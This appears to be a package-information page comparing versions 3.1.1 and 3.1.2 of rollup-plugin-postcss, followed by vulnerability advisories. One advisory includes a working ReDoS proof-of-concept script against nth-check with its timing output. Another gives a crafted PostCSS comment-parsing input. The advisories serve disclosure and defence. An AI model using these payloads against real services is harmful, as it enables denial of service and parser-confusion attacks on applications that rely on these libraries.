Rollup-plugin-postcss is a valuable tool for developers seeking seamless integration between Rollup and PostCSS in their projects. Version 3.1.2, released on June 4th, 2020, builds upon the foundation laid by the previous stable version, 3.1.1, released on April 24th, 2020. While both versions share core functionalities, dependencies, and development tools, subtle differences exist, primarily in the dist section and release date. The dist object reveals that version 3.1.2 has a slightly smaller unpacked size (38560 bytes) compared to version 3.1.1 (38562 bytes), even if both packages contains the same number of files. This minor difference might indicate small optimizations or changes in the build process.
For developers, both versions offer a robust solution for processing CSS with PostCSS within the Rollup ecosystem. Key features include handling various CSS-related transformations, such as autoprefixing, minification (using cssnano), and CSS Modules. The plugin relies on dependencies like "postcss-load-config" which enables developers to effortlessly load their existing PostCSS configurations. The "style-inject" dependency ensures that processed CSS is seamlessly injected into the document. Developers already familiar with Rollup and PostCSS can easily integrate this plugin into their workflow, leveraging the power of both tools for optimized and maintainable CSS. Choosing between version 3.1.1 and 3.1.2 might depend on specific project requirements, but both versions remain viable options for modern web development.
All the vulnerabilities related to the version 3.1.2 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.